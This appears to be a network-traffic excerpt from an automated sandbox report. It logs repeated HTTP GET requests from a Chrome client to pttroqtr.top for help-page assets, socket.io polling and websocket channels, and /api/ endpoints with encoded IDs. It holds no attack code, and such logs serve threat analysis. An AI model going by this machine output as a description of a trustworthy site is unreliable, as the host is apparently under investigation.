Source: global trafficHTTP traffic detected: GET /help/assets/2e158738kFGym.woff HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttroqtr.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://pttroqtr.top/help/assets/2dd339f2kFGym.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjax1&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/8b4af40ckFGym.css HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/assets/2dd339f2kFGym.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjbBy&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/32.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjbRz&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/33.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/34.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/35.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjax1&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjawy&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/MC40NjgzNzc3MjY1OTI2NzY3NA== HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjbBy&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjbC1&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/32.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjbam&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/36.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/37.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/38.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/39.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjbRz&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/MC42NDcxMDI1MjYyOTk4MDM0 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/33.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/35.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/34.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/40.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjc6P HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/41.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/42.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/43.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/44.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/45.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/37.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/38.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/39.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/36.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/40.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjc6P HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=H_Y22m0FJjANkstPAEf3 HTTP/1.1Host: pttroqtr.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttroqtr.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: jemgbiASOcZ7yvJee6QQsg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjcG1&sid=H_Y22m0FJjANkstPAEf3 HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/42.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/46.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/47.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/44.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/48.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/41.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/49.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/43.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/45.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
